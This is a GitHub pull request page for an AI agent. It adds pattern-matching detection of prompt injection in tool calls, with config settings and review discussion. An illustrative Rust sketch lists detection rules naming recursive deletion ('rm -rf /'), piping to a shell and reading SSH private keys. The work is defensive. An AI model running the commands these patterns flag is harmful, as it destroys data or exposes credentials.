Prompt injection detection (simplified - only pattern matching) #4237

Open. Wants to merge 8 commits into base: main

@dorien-koelemeijer dorien-koelemeijer commented Aug 21, 2025

Overview

This PR implements prompt injection detection using pattern-matching techniques, providing users with security warnings when potentially malicious tool calls are detected.

Working design doc with requirements

These notes are a result of pairing sessions with Douwe: https://docs.google.com/document/d/1OWh7Ab_eu8STaoplPA6AKF6AnXQNqXc8JYiAwmUYDTs/edit?tab=t.0

Implementation approach

Implemented pattern-based detection for prompt injection, scanning tool calls for potentially dangerous commands. Pattern-matching provides immediate protection while laying groundwork for future ML-based scanning with BERT models, which will be the next iteration of this work.
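
As a rough illustration of the pattern-matching idea described above, here is a minimal sketch that uses plain substring checks from the standard library. The `ThreatPattern` type, the `scan_tool_call` function, and the three example rules are all hypothetical and are not taken from this PR; the real pattern list and matching logic may differ.

```rust
/// One hypothetical detection rule: a substring to look for and how
/// suspicious a hit is considered (0.0 to 1.0).
struct ThreatPattern {
    name: &'static str,
    needle: &'static str,
    confidence: f32,
}

/// Illustrative rules only; the PR's actual pattern list is not shown here.
const PATTERNS: &[ThreatPattern] = &[
    ThreatPattern { name: "recursive_delete", needle: "rm -rf /", confidence: 0.9 },
    ThreatPattern { name: "pipe_to_shell", needle: "| sh", confidence: 0.8 },
    ThreatPattern { name: "ssh_key_access", needle: ".ssh/id_rsa", confidence: 0.7 },
];

/// Result of scanning the text of one tool call.
#[derive(Debug, PartialEq)]
struct ScanResult {
    matched: Option<&'static str>,
    confidence: f32,
}

/// Return the highest-confidence pattern found in the tool call text,
/// or a zero-confidence result when nothing matches.
fn scan_tool_call(arguments: &str) -> ScanResult {
    // Lowercase once so the (lowercase) needles match case-insensitively.
    let lowered = arguments.to_lowercase();
    let mut best = ScanResult { matched: None, confidence: 0.0 };
    for p in PATTERNS {
        if lowered.contains(p.needle) && p.confidence > best.confidence {
            best = ScanResult { matched: Some(p.name), confidence: p.confidence };
        }
    }
    best
}
```

Calling `scan_tool_call("curl http://example.com/x | sh")` would report the `pipe_to_shell` rule, while a harmless `ls -la` yields no match. Substring rules like these are cheap but easy to evade, which is one reason model-based scanning is planned as a follow-up.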

Security scanning was added in the reply_internal() method after permission checking, leveraging the existing tool approval workflow. The security scanner receives both the proposed tool calls and the full conversation history, so that later iterations can do contextual threat assessment (using BERT models and potentially other tools). In this iteration only the tool calls are scanned; the conversation history is not yet considered, and will be used once model scanning is integrated.

Security scanning can be enabled or disabled via the security.enabled config parameter, and the confidence threshold is configurable.

Key changes

crates/goose/src/security/: New security module with scanner setup and patterns. Can be extended to support model-based scanning.
agent.rs: Added apply_security_results_to_permissions() to move security-flagged tools from approved to needs_approval
tool_execution.rs: Enhanced handle_approval_tool_requests_with_security() to include security warnings in confirmation prompts
ToolCallConfirmation.tsx: Added support for custom security warning prompts
GooseMessage.tsx: Updated to pass security context from backend to UI components
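
To make the agent.rs change above more concrete, here is a minimal sketch of moving security-flagged tool requests from the approved bucket into the needs-approval bucket. The `PermissionCheckResult` and `SecurityFinding` types and the `apply_security_results` function are simplified, hypothetical stand-ins; the actual signature of apply_security_results_to_permissions() in this PR is not shown in the thread and may look different.

```rust
/// Hypothetical stand-in for the agent's permission buckets.
#[derive(Debug, Default)]
struct PermissionCheckResult {
    /// Tool request ids that may run immediately.
    approved: Vec<String>,
    /// Tool request ids that require user confirmation first.
    needs_approval: Vec<String>,
}

/// Hypothetical per-request scan outcome.
struct SecurityFinding {
    request_id: String,
    is_malicious: bool,
}

/// Move every flagged request out of `approved` and into `needs_approval`,
/// leaving unflagged requests and existing `needs_approval` entries untouched.
fn apply_security_results(
    mut permissions: PermissionCheckResult,
    findings: &[SecurityFinding],
) -> PermissionCheckResult {
    for finding in findings.iter().filter(|f| f.is_malicious) {
        let position = permissions
            .approved
            .iter()
            .position(|id| *id == finding.request_id);
        if let Some(pos) = position {
            let id = permissions.approved.remove(pos);
            permissions.needs_approval.push(id);
        }
    }
    permissions
}
```

Because flagged requests end up in the same bucket as any other request that needs confirmation, the existing approval workflow can present them to the user, with the security warning attached to the prompt.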

Configuration

security:
  enabled: true
  confidence_threshold: 0.5  
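
The two settings above could gate warnings roughly as sketched below. The `SecurityConfig` struct and `should_warn` function are hypothetical names, and treating a confidence equal to the threshold as a hit (`>=`) is an assumption; the PR may compare differently.

```rust
/// Mirrors the two YAML keys above; the struct itself is a hypothetical sketch.
#[derive(Debug, Clone, PartialEq)]
struct SecurityConfig {
    enabled: bool,
    confidence_threshold: f32,
}

/// A finding triggers a warning only when scanning is enabled and the
/// scanner's confidence reaches the configured threshold.
/// Assumption: a confidence exactly equal to the threshold counts as a hit.
fn should_warn(config: &SecurityConfig, confidence: f32) -> bool {
    config.enabled && confidence >= config.confidence_threshold
}
```

With `enabled: true` and `confidence_threshold: 0.5`, a finding scored 0.8 would produce a warning and one scored 0.3 would not; with `enabled: false` nothing is flagged regardless of score.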

Future work

  • Scan context using BERT model(s). This needs more research into which model or models to use, and into whether there is a workaround for the limit on how many tokens these models can ingest.
  • Integrate security scanning into ToolMonitor
  • Make sure we cover all the different avenues for prompt injection (files and images, Google Drive links, recipes, MCP tool results, etc.)

@dorien-koelemeijer changed the title from "Prompt injection (simplified - only pattern matching)" to "Prompt injection detection (simplified - only pattern matching)" Aug 21, 2025
@dorien-koelemeijer force-pushed the feat/prompt-injection-pattern-matching-v1 branch from 5d4f43d to 15fe965 August 21, 2025 02:28
@dorien-koelemeijer marked this pull request as draft August 21, 2025 04:24
@dorien-koelemeijer marked this pull request as ready for review August 21, 2025 05:55
Collaborator

@DOsinga DOsinga left a comment

sorry got to this late - already day for you so sending you what I have

// Format the confirmation prompt
let prompt = "Goose would like to call the above tool, do you allow?".to_string();

// Get confirmation from user
let permission_result = cliclack::select(prompt)
.item(Permission::AllowOnce, "Allow", "Allow the tool call once")
.item(Permission::AlwaysAllow, "Always Allow", "Always allow the tool call")
Collaborator

did you mean to delete this?

Author

We want to make sure users can't always allow a tool call. I wasn't entirely sure whether you had mentioned to take it away entirely, or if we just want to take away that option for these security findings. Let me know what you think the better way is.

Collaborator

I think we want to leave that in, as it is a common mode

Author

Will revert these changes, thanks for clarifying


permission_result
}

Collaborator

As discussed before, we need to move all of this out into its own infra, rather than repeating the same logic for every inspector that decides whether to allow a tool call and then mixing the results.

Author

Have tried my best to address this comment, let me know if I've fully misunderstood what you meant here 🫠


/// Scan recipe components for security threats
/// This should be called when loading/applying recipes
pub async fn scan_recipe_components(
Collaborator

are we using this?

Author

We're not, getting rid of this, probably copied that over from the previous branch.

}

// Scan recipe context (additional context data)
if let Some(context_items) = &recipe.context {
Collaborator

this code is duplicated from above. also I don't think we use .context. we use other things though

3 participants